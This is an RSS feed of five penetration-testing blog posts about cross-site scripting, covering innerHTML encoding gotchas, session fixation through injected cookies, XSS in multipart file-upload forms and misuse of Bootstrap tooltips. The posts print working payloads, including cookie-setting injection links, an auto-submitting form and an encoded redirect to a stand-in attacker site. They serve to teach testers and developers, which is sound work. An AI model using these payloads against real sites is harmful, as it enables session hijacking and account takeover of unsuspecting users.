<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; xss</title>
	<atom:link href="http://www.exploresecurity.com/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on -</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>http://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>http://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8243; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
<h3>3. The victim logins in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way, it varies between browser. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie because for that to happen the name, path and domain must match. That would mean having to change both attributes from their defaults but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffered from XSS so the attacker crafts a malicious link to set the known cookie on the victim.</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230;One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read it nor overwrite it. This behaviour isn&#8217;t standardised, it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflective XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflective XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Tricky Case of XSS</title>
		<link>http://www.exploresecurity.com/a-tricky-case-of-xss/</link>
		<comments>http://www.exploresecurity.com/a-tricky-case-of-xss/#comments</comments>
		<pubDate>Thu, 10 Apr 2014 20:55:52 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=169</guid>
		<description><![CDATA[On a recent test I came across a reflective XSS condition within a file upload page. When the extension was deemed invalid by the application, it was returned unsanitised within the error message. Not only did this turn out to be an exercise in exploiting reflective XSS in multipart/form-data but there were some pretty hefty [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>On a recent test I came across a reflective XSS condition within a file upload page. When the extension was deemed invalid by the application, it was returned unsanitised within the error message. Not only did this turn out to be an exercise in exploiting reflective XSS in multipart/form-data but there were some pretty hefty restrictions on allowed characters too. Worthy of a post I thought.<span id="more-169"></span></p>
<h2>XSS in multipart/form-data</h2>
<p>An example of a malicious payload contained something like:</p>
<p><code>Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=alert(1)&gt;"</code></p>
<p>This produced a response that included:</p>
<p><code>File Upload failed: "File extension '&lt;img src=a onerror=alert(1)&gt;'</code></p>
<p>Of course, normally reflective XSS in POST is exploited by a form that auto-submits through JavaScript. But this one was a bit trickier &#8211; how can you replicate the multipart/form-data structure? When you begin to experiment with this you soon find some difficulties &#8211; for example, submitting a filename when no file was actually chosen by the victim user. An XHR request could compose the request but then you run into the Same Origin Policy. In this case there was no wide-open CORS policy to allow me to process the response from the request. Besides which, this wouldn&#8217;t allow me to run script in the context of the target domain in the usual way of XSS; it merely allows me access to the response, which restricts the impact.</p>
<p>I finally found a big hint courtesy of a CSRF article <a href="http://kuza55.blogspot.co.uk/2008/02/csrf-ing-file-upload-fields.html">here</a>. My proof of concept payload was as follows:</p>
<p><code>&lt;form name="xss" method="post" action="http://domain.site/upload.page" enctype="multipart/form-data"&gt;<br />
&lt;textarea name='file"; filename="test.&lt;img src=a onerror=alert(1)&gt;'&gt;<br />
File Contents Didn't Matter Here<br />
&lt;/textarea&gt;<br />
&lt;input name="action" value="fileupload"/&gt;<br />
&lt;input type="submit" name="" value="" size="0" /&gt;<br />
&lt;/form&gt;<br />
&lt;script&gt;document.xss.submit();&lt;/script&gt;</code></p>
<p>This produced the following POST body:</p>
<p><code>-----------------------------7de21b3079c<br />
Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=alert(1)&gt;"</code></p>
<p><code>File Contents Didn't Matter Here</code><br />
<code>-----------------------------7de21b3079c</code><br />
<code> Content-Disposition: form-data; name="action"</code></p>
<p><code>fileupload<br />
-----------------------------7de21b3079c--</code></p>
<p>Note how the filename attribute of the request is sneaked in by means of the form&#8217;s textarea name. The request is missing the normal multipart/form-data Content-Type header but I didn’t need it so I didn&#8217;t pursue that any further.</p>
<p>And now for the caveats! I tried this on Chrome, Firefox and IE10 and it only worked on IE &#8211; the other two added escape characters that broke the payload. Also, you may be thinking &#8220;why the img onerror? Why not good old &lt;script&gt;&#8230;&lt;/script&gt;?&#8221; The / character caused issues &#8211; presumably because it was interpreted as a delimiter for directories (remember, this is a file upload page). The \ character posed similar issues. And so did &#8216; for obvious reasons &#8211; it terminates the textarea name value too early. A &#8221; was fine so long as it was injected as \&#8221;. Finally a . was treated as an extension delimiter so everything to the left of the right-most . was lost in the response (because the error returned the extension, not the full filename). So what does all that mean for a more interesting payload?</p>
<h2>alert(1) is lame</h2>
<p>I always try to put something of value in a XSS payload and alert(1) shows nothing. Even alert(document.cookie) proves that JavaScript can access session cookies when they&#8217;re not HttpOnly. But with / \ &#8216; and . being consumed by the page, what could I do? I got into an email conversation with two NCC colleagues, Gareth and Soroush (<a href="https://twitter.com/irsdl">@irsdl</a>), and after some to-ing and fro-ing they came up with:</p>
<p><code>&lt;textarea name='file"; filename="test.&lt;img src=a onerror=document&amp;amp;#46;location&amp;amp;#61;&amp;amp;#34;http:&amp;amp;#47;&amp;amp;#47;evil&amp;amp;#46;site&amp;amp;#34;&gt;'&gt;</code></p>
<p>The browser decodes this once (&amp;amp; becomes &amp;) to send:</p>
<p><code>Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;&gt;"</code></p>
<p>Back comes the HTTP response with:</p>
<p><code>&lt;img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;&gt;</code></p>
<p>Which decodes to:</p>
<p><code>&lt;img src=a onerror=document.location="http://evil.site"&gt;</code></p>
<p>And this of course redirects the browser immediately to evil.site, where some kind of exploitation or phishing could be undertaken. Job done.</p>
<p>This was one of the trickiest XSS injections I have come across. Hopefully you found something new here and you can add a couple of new XSS payloads to your arsenal.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/a-tricky-case-of-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DOM XSS by Misusing Bootstrap</title>
		<link>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/</link>
		<comments>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/#comments</comments>
		<pubDate>Sun, 02 Mar 2014 23:18:58 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[bootstrap]]></category>
		<category><![CDATA[dom-xss]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=159</guid>
		<description><![CDATA[First of all, let me make it clear that this article is not about XSS in Bootstrap itself (the very popular libraries originally from Twitter to fancify your website), it&#8217;s about XSS as a result of using Bootstrap in an insecure fashion. It&#8217;s based on a real penetration test &#8211; the site in question wasn&#8217;t [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>First of all, let me make it clear that this article is <em>not</em> about XSS in Bootstrap itself (the very popular libraries originally from Twitter to fancify your website), it&#8217;s about XSS as a result of using Bootstrap in an insecure fashion. It&#8217;s based on a real penetration test &#8211; the site in question wasn&#8217;t vulnerable but it was immediately clear how things could have gone wrong. I thought it would be an interesting XSS article, being both DOM-based and making use of a big-name library like Bootstrap.<span id="more-159"></span></p>
<p>To illustrate the point I&#8217;ve written a vulnerable page. <em>What, it&#8217;s vulnerable to XSS?</em> Yes. <em>Do you know what you&#8217;re doing?</em> I hope so. Here&#8217;s the brief:</p>
<ul>
<li>Try to create a DOM-based XSS condition that runs <code>&lt;script&gt;alert(1)&lt;/script&gt;.</code></li>
<li>Don&#8217;t bother trying to inject any other kind of script &#8211; it won&#8217;t work and the result may throw you. If it does work, I run a white-hat vulnerability programme &#8211; sorry, no bounty, just my thanks and a credit on the page <img src='http://www.exploresecurity.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </li>
<li>Getting the alert box to pop up shouldn&#8217;t be hard at all &#8211; what&#8217;s more interesting is to spot the Bootstrap implementation error. When you view the source, note the comment on line 22 to ignore the indented lines (23-26 and 28) &#8211; that&#8217;s the code that should be protecting the page from arbitrary XSS.</li>
<li>The page is <a title="Bootstrap DOM XSS" href="http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html" target="_blank">here</a>.</li>
</ul>
<h2>Discussion</h2>
<p>I&#8217;m assuming you&#8217;ve had a look at the page above. The Bootstrap JavaScript plugin allows you to use &#8220;tooltips&#8221; (information shown on mouseover) that write into the DOM. Because of this, you can create more advanced tooltips by writing HTML code into the DOM. This is when the alarm bells should sound. In my page the email address, when invalid, is coloured red. But because the email address is under user control and can be pre-populated in the query string, there&#8217;s a DOM-based XSS condition, e.g. <a title="Solution" href="http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html?email=&lt;script&gt;alert(1)&lt;/script&gt;" target="_blank">http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html?email=&lt;script&gt;alert(1)&lt;/script&gt;</a>, which will fire when the victim hovers over the email address.</p>
<p>To get HTML inserted by a tooltip you need to set the attribute <code>data-html="true"</code>. The default is false, which means the content is encoded before insertion into the page. But if you want to add some markup, such as changing the colour, you&#8217;ll need to set it to true. In this case if any part of the content is user-supplied, it needs to be handled safely.</p>
<p>The XSS risk is clearly stated in the <a href="http://getbootstrap.com/javascript/#tooltips-usage" target="_blank">documentation</a> but that doesn&#8217;t mean mistakes won&#8217;t be made. In the test that prompted this article, the <code>data-html</code> attribute was set to true everywhere, even when the content being displayed was straight text. Of course, no harm in that case &#8211; but in a few places the content was dynamic. Sadly (for me) this content was not under user control.</p>
<h2>Conclusion</h2>
<p>Developers and penetration testers may assume that popular and big-name libraries like Bootstrap (especially the latest version) are safe but this article shows that it depends on how they&#8217;re being used. As a penetration tester, watch out for client-side code that modifies the page and research the (potentially) dangerous options in popular third-party libraries (look out for that <code>data-html</code> attribute!). As a developer, it&#8217;s all about (as ever) handling user-supplied content safely &#8211; and this article emphasises that you can&#8217;t always rely on third-party libraries to do everything for you. With great power comes great responsibility.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
